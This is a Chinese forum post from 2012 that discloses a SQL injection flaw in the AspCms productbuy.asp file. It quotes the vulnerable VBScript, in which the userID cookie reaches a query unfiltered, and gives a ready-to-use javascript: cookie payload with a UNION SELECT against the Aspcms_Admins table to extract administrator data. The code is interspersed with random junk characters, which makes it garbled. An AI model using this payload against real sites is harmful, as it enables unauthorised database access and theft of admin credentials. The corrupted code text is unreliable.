好久没上土司了,上来一看发现在删号名单内....., `6 I+ k/ m/ c3 v3 G2 [
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。* j) J; u9 \- j# b) g; _
废话不多说,看代码:4 G2 U+ w; ^2 R: J
( j, N" d) R6 y+ f' y, u) g
<%
0 v& S" ]" U' R- p" S: p. W1 ^$ \' L, W7 f7 ]$ [: Z
if action = "buy" then
1 B: X; W D' a2 x
P9 H v' _: w: R. ] addOrder()0 F5 u V5 K/ i) u0 @! n
# |; i2 ] d) I+ Q# I B
else
. O K, L6 W f1 C# m1 g9 U
) z, ]. A4 Y: R+ P6 g! _ echoContent()
' X" V/ B4 h, r! k; ]* l/ l# e F
d" A0 ~' u5 ^2 Lend if
; ?, j$ k/ D$ e* d0 ~& S, ?! e
! T" j2 }# a; C- [& L4 N* K T. e
/ d6 q- _2 J, D' s' l' @
/ S( W7 x6 Y* Z0 q. L" Z0 M. v……略过
' B6 L$ t7 T$ n; s, j
9 y! z1 l0 N' h" c; w, B
8 Q& j- [$ I% t4 |: `: U$ L: [6 m2 x& G, N, W* n6 Z% q' C$ ~
Sub echoContent()
* [1 U$ [- R- K* Z2 O0 s' F
" P0 g, x7 u K/ [6 O$ Z: H dim id
' Z) M) Y( r# u l9 R; i
* ?( {' a" y2 [: D& L( K id=getForm("id","get")
6 Q5 t$ E p. z( D, T1 L
% |2 q4 B q& H! B5 x i* _6 Q* S # F9 E. L* F( Q* |5 m" |
1 F2 p; g% Y5 |) o( x
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
. E, f) M7 s+ }' a5 p5 n' w6 m0 s
8 M3 D! y- }- z+ b 1 l: v% K1 Q: v4 h9 m% S0 I: q) S
+ a5 x/ g5 K: q- _- z) H$ f dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
9 |; u+ M( R4 g3 v
8 U( f O$ ^' d: t$ |7 I { dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct+ H# J6 {6 x; j. A
# K1 A) }0 `8 e+ J0 v. ` Dim templatePath,tempStr$ N) t+ U; g- D L9 b
$ l, |4 N2 p6 v$ L0 X! X templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"* R0 }0 ~0 g1 J) h# s! w8 H
& L, R4 o8 b" N4 }
! x" p5 w$ ^2 p5 G
9 k M- d+ g% J' K8 p set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
% f4 i: U$ f+ x' I8 U3 \( K
Y" K- }- |" O, s, @4 U( N; T selectproduct=rsObj(0)# ]) Z; r) D, c$ ^! s1 [
2 R V6 ]' v7 q4 m& ?
7 x2 I6 G7 m; L' \# @+ ]6 l+ x
, \9 _% W s3 W$ D3 s7 a3 ^7 D Dim linkman,gender,phone,mobile,email,qq,address,postcode
. p1 j0 u1 {3 J/ @: D
. B. N" \2 \) j/ J" l if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0, y R0 S5 b! q: k
7 h' r- w/ |: R) |! @* A6 i- e$ c
if rCookie("loginstatus")=1 then
9 l6 @7 I& n9 W6 A! S9 N) L; ?3 k
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")5 B% @ \7 X; n6 O: V* m
9 F6 U1 w( E4 ^
linkman=rsObj("truename")
: f; b0 G1 K+ V' M' ^. f
1 Z$ B1 w" y$ l1 {: g" u% a gender=rsObj("gender")
& G- _9 D- ^. c8 N( S. ?/ X' @3 {/ l% ?! t4 @
phone=rsObj("phone")
+ J N, A, \$ F1 `& _* d. Q
$ X! y6 W( _0 u mobile=rsObj("mobile")! N# n }9 }( r- |& ]6 U
# v& \0 c4 q2 T" C$ ] email=rsObj("email")
, J/ I3 E" ?1 C) |* X# ~' ^& n$ N" {8 O; H3 O
qq=rsObj("qq")
- }" Q. w6 d) _- R! R, g; e1 k" X: x0 G0 u9 P# U: R
address=rsObj("address")
; n% A! Z( i C2 f# e9 w! T. s; E. i2 _9 j- B3 i, C3 A& N
postcode=rsObj("postcode") s4 U8 d/ Y) Z( ]. ~) c
7 v( `& d! V& r
else . l% f" ~) k, L/ ?3 ~6 C& O
1 n5 c/ r' U3 C# D
gender=1
! e) C# v. a w9 m; J M
$ {- E" a1 m/ b+ B \# c end if
6 j( G% H( r% W1 V9 X: v) |. i1 ?& b2 ]* Q& o2 }2 M
rsObj.close()+ ]5 m# ^5 S5 f
# i# W- s7 x, t. V' T
' n- v6 G* E3 t8 n" O8 k r
( X% \ J3 o6 g+ b! A( O& T with templateObj 7 w9 s- o1 W! S* W* }# M
0 U, q; L- J e% b1 c7 l' j4 g: r
.content=loadFile(templatePath)
7 T. q" g( R% ]! [
) w( i& D. Y3 C- _# p .parseHtml()
2 s% c; @ Y5 |6 ?9 S- _/ }8 l& ]8 ?( ?3 w/ a$ r8 n) Z
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)9 v& z& U3 |5 s" Z
! n0 ?9 z$ g" y$ ]% V .content=replaceStr(.content,"[aspcms:linkman]",linkman) # ]. L$ z5 {+ `! C" d
) p2 z- {# j" ?2 ` a3 a- s8 D4 s
.content=replaceStr(.content,"[aspcms:gender]",gender)
" K1 F) x j& [# Y* X; b
) n7 `7 G- |2 A( [# X .content=replaceStr(.content,"[aspcms:phone]",phone)
% ~1 p$ ]/ P/ p; ?8 U/ s6 N2 v( H! b* r; j! o3 y$ O: `
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 8 [0 U6 t0 F8 M# J4 ~% D3 Z
9 V6 y8 t K4 p .content=replaceStr(.content,"[aspcms:email]",email) + m2 K5 X9 N- e9 p7 n
5 A6 G" T/ H6 ^, C' j
.content=replaceStr(.content,"[aspcms:qq]",qq) / I5 P5 a; k+ |# u8 p0 d8 F
; R4 W" R4 z& x% e7 Y2 Y+ U .content=replaceStr(.content,"[aspcms:address]",address) , v v, a F! e
2 b8 O" k' b0 h( [
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
4 b$ H$ t0 m2 g: R e% P0 F0 s% q9 ]0 z4 z, U
.parseCommon()
% _1 v& U3 k# q& k% N, E1 L/ V7 g/ E f
echo .content / {! H' h' @7 O5 j G
$ b5 i" O% c, j8 F4 K end with1 H8 i; U: t1 ?$ D6 B `9 s
7 @- w+ z2 r& W, u% W% y7 t set templateobj =nothing : terminateAllObjects
$ q1 M6 |' d. r2 M% b- j3 ^7 R9 S5 G
6 \" G1 h. A, y, c7 ]End Sub0 T( T! `9 |7 d& i" o8 k4 O
漏洞很明显,没啥好说的5 O: i' Z, U/ W$ f# L' b
poc:
5 A% {$ h% c" N; w- X. Y d4 y+ q1 l0 y2 l6 l
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
% r V9 V1 I& w/ a: a. O3 h
6 V# t- k0 M3 J- O1 t$ C, C |
发表于 2012-12-27 08:35:05
收藏
支持
反对